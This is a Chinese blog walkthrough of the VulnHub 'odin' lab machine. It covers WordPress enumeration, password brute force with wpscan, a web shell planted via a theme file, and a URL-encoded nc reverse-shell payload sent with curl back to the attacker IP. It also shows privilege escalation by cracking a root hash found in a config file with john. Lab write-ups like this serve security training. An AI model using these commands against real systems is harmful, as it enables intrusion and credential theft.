<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="magisec" />
  <meta name="author" content="magisec" />
  <meta name="description" content="magisec" />
  
  
  <title>
    
      odin 
      
      
      |
    
     magisec网络安全博客
  </title>

  
    <link rel="apple-touch-icon" href="https://ae01.alicdn.com/kf/U8f9a193ee8f04b09b08b3d8ceedb159d2.jpg">
    <link rel="icon" href="https://ae01.alicdn.com/kf/U8f9a193ee8f04b09b08b3d8ceedb159d2.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

<meta name="generator" content="Hexo 5.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="https://ae01.alicdn.com/kf/U8f9a193ee8f04b09b08b3d8ceedb159d2.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Dmagic</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">odin</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2020-12-27 15:20:08
        </span>
        
      </div>
      <div class="markdown-body">
        <h2 id="环境情况"><a href="#环境情况" class="headerlink" title="环境情况"></a>环境情况</h2><p>攻击机IP：192.168.56.105</p>
<p>靶机IP：192.168.56.120</p>
<p>修改一下kali的hosts</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;odin 192.168.56.120&quot; &gt;&gt; &#x2F;etc&#x2F;hosts</span><br></pre></td></tr></table></figure>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="Nmap扫描端口"><a href="#Nmap扫描端口" class="headerlink" title="Nmap扫描端口"></a>Nmap扫描端口</h3><p><img src="https://img.rruu.net/image/5fe835e7205db" alt="image-20201222151951057"></p>
<h4 id="扫描结果分析："><a href="#扫描结果分析：" class="headerlink" title="扫描结果分析："></a>扫描结果分析：</h4><p>系统版本：ubunut</p>
<p>开放端口：80</p>
<p>80 web</p>
<h4 id="攻击思路："><a href="#攻击思路：" class="headerlink" title="攻击思路："></a>攻击思路：</h4><p>通过80端口getshell</p>
<h2 id="80端口渗透测试"><a href="#80端口渗透测试" class="headerlink" title="80端口渗透测试"></a>80端口渗透测试</h2><p>firefox打开网站</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">firefox http:&#x2F;&#x2F;odin&#x2F;</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe835ed656c9"></p>
<h3 id="解密密文"><a href="#解密密文" class="headerlink" title="解密密文"></a>解密密文</h3><p>进入网站，发现网站存在编码，可能是base64。我们使用base64解码，发现乱码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTUMFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU&#x3D;&#x3D;&#x3D;63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTUFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU&#x3D;&#x3D;&#x3D;&quot; | base64 -d</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe835f349a5a" alt="image-20201222152523386"></p>
<p>继续解码，他这个的意思是说，如果你细心那么就不用看这里。</p>
<p><img src="https://img.rruu.net/image/5fe835f84601c" alt="image-20201222152335816"></p>
<p>继续探测发现一串密码，解密网站：<a target="_blank" rel="noopener" href="http://tool.bugku.com/brainfuck/?wafcloud=1">http://tool.bugku.com/brainfuck/?wafcloud=1</a> 目前也不知道有何用。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nottuzy</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe835fdccf9f" alt="image-20201222152841015"></p>
<h3 id="whatweb识别cms"><a href="#whatweb识别cms" class="headerlink" title="whatweb识别cms"></a>whatweb识别cms</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whatweb http:&#x2F;&#x2F;192.168.56.120&#x2F;</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe83602ba86f" alt="image-20201222153905511"></p>
<p>网站架构：wordpress 5.5.3 apache ubuntu</p>
<h3 id="搜索历史漏洞"><a href="#搜索历史漏洞" class="headerlink" title="搜索历史漏洞"></a>搜索历史漏洞</h3><p>没有发现利用价值的漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">seachsploit WordPress 5.5.3</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe836083d218" alt="image-20201222154126090"></p>
<h3 id="wpscan扫描网站"><a href="#wpscan扫描网站" class="headerlink" title="wpscan扫描网站"></a>wpscan扫描网站</h3><p>简单检测一下网站</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http:&#x2F;&#x2F;odin&#x2F; -e</span><br></pre></td></tr></table></figure>
<p>有价值的信息如下：</p>
<p><img src="https://img.rruu.net/image/5fe8360e137d8" alt="image-20201222155420951"></p>
<p>使用cewl生成爆破字典</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cewl http:&#x2F;&#x2F;odin&#x2F; &gt; pass.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe836133195c" alt="image-20201222160131060"></p>
<p>我们使用wpscan暴力破解一下admin的密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http:&#x2F;&#x2F;odin&#x2F; --usernames admin --passwords .&#x2F;pass.txt --password-attack wp-login</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe836184c225" alt="image-20201222155839817"></p>
<p>爆破失败，我们再用一下自带字典，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http:&#x2F;&#x2F;odin&#x2F; --usernames admin --passwords &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt --password-attack wp-login</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe8361e89098" alt="image-20201222155643800"></p>
<h3 id="wordpress模板文件getshell"><a href="#wordpress模板文件getshell" class="headerlink" title="wordpress模板文件getshell"></a>wordpress模板文件getshell</h3><p><img src="https://img.rruu.net/image/5fe836248494f" alt="image-20201222160355158"></p>
<p><img src="https://img.rruu.net/image/5fe8362a0794c" alt="image-20201222160417063"></p>
<h3 id="nc反弹shell"><a href="#nc反弹shell" class="headerlink" title="nc反弹shell"></a>nc反弹shell</h3><p>kali执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 9001</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe8362edec63" alt="image-20201222160704805"></p>
<p>然后开另外一个终端执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http:&#x2F;&#x2F;odin&#x2F;?magisec&#x3D;rm+%2ftmp%2ff%3bmkfifo+%2ftmp%2ff%3bcat+%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+192.168.56.105+9001+%3e%2ftmp%2ff</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe836339d6a6" alt="image-20201222160715537"></p>
<h2 id="特权提升"><a href="#特权提升" class="headerlink" title="特权提升"></a>特权提升</h2><h3 id="Python3切换bash"><a href="#Python3切换bash" class="headerlink" title="Python3切换bash"></a>Python3切换bash</h3><p>这个机器没有python2，用的python3我们这里命令要换成python3</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c &#39;import pty;pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;)&#39;</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe836389462a" alt="image-20201222160838725"></p>
<h3 id="主机信息收集"><a href="#主机信息收集" class="headerlink" title="主机信息收集"></a>主机信息收集</h3><p>首先查看web网站的配置文件</p>
<p><img src="https://img.rruu.net/image/5fe8363dbfc8c" alt="image-20201222163307124"></p>
<p>看到下面，有root密码。</p>
<p><img src="https://img.rruu.net/image/5fe83642a15f6" alt="image-20201222165537456"></p>
<h3 id="john破解密码"><a href="#john破解密码" class="headerlink" title="john破解密码"></a>john破解密码</h3><p>将密码保存到root.txt中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#39;$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg&#x2F;&#x2F;71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01&#39; &gt; .&#x2F;vulnhub&#x2F;odin&#x2F;root.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe8364754216" alt="image-20201222165641152"></p>
<p>使用john破解密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john --wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt root.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe8364c5242b" alt="image-20201222165730160"></p>
<p>密码已经出来了，使用show来查看一下。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john root.txt --show</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe83650d59c6" alt="image-20201222165759327"></p>
<p>切换root</p>
<p><img src="https://img.rruu.net/image/5fe83655e02aa" alt="image-20201222165916528"></p>
<h3 id="获取flag文件"><a href="#获取flag文件" class="headerlink" title="获取flag文件"></a>获取flag文件</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat bjorn</span><br></pre></td></tr></table></figure>
<p><img src="https://img.rruu.net/image/5fe8365b6fb0f" alt="image-20201222165944197"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2020/12/26/Lampiao/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2020-12-27 15:20:08
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2020/12/27/Os-hackNos3/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div class="post-catalog" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%83%85%E5%86%B5"><span class="toc-text">环境情况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap%E6%89%AB%E6%8F%8F%E7%AB%AF%E5%8F%A3"><span class="toc-text">Nmap扫描端口</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C%E5%88%86%E6%9E%90%EF%BC%9A"><span class="toc-text">扫描结果分析：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-text">攻击思路：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#80%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95"><span class="toc-text">80端口渗透测试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E5%AF%86%E5%AF%86%E6%96%87"><span class="toc-text">解密密文</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#whatweb%E8%AF%86%E5%88%ABcms"><span class="toc-text">whatweb识别cms</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%9C%E7%B4%A2%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E"><span class="toc-text">搜索历史漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wpscan%E6%89%AB%E6%8F%8F%E7%BD%91%E7%AB%99"><span class="toc-text">wpscan扫描网站</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wordpress%E6%A8%A1%E6%9D%BF%E6%96%87%E4%BB%B6getshell"><span class="toc-text">wordpress模板文件getshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nc%E5%8F%8D%E5%BC%B9shell"><span class="toc-text">nc反弹shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%B9%E6%9D%83%E6%8F%90%E5%8D%87"><span class="toc-text">特权提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Python3%E5%88%87%E6%8D%A2bash"><span class="toc-text">Python3切换bash</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">主机信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#john%E7%A0%B4%E8%A7%A3%E5%AF%86%E7%A0%81"><span class="toc-text">john破解密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96flag%E6%96%87%E4%BB%B6"><span class="toc-text">获取flag文件</span></a></li></ol></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        





      </div>
    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/magisec/">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        Copyright © magisec 2021
        
    </div>
  
</div>

      </div>

      <div class="back-to-top hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



      
  <div class="search-icon" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




    </div>
  </body>
</html>
